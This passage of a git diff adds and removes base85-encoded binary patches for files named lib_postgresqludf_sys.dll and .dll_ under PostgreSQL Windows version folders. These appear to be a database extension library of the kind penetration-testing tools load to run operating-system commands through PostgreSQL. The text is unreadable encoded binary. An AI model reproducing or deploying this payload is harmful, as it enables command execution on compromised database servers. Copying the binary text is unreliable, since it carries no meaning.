zuoK_|fTI9s0onkZJzyamga=t~a6o`a(37+8lVCTh!O<8TevPgv5Esfc@<NqDR$$U9
zAbp{%Km|TkXR|C{rG-o7V3uAK{)Pm6YcJ~*fG^Vk%azcJUYvE8v8&>=aaNwII&;>}
T5Tm2RS46FF#_*r=do%EFCh8<F

diff --git a/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ b/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
new file mode 100644
index 0000000000000000000000000000000000000000..2d3ce9f9eaa1445c119cb368fce68d4667227ff1
GIT binary patch
literal 4755
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

literal 0
HcmV?d00001

diff --git a/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll b/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll
deleted file mode 100755
index 9113b56c27f721bc8bdaaafd6ccf2d198d3e78d1..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6656
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
ZrjD95ND<12OI@12)RDt~+P_<Y{{jG^CJ6ul

diff --git a/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ b/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
new file mode 100644
index 0000000000000000000000000000000000000000..c4fd18d28aa180e35a36cc7205927c0ee77f9483
GIT binary patch
literal 4766
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
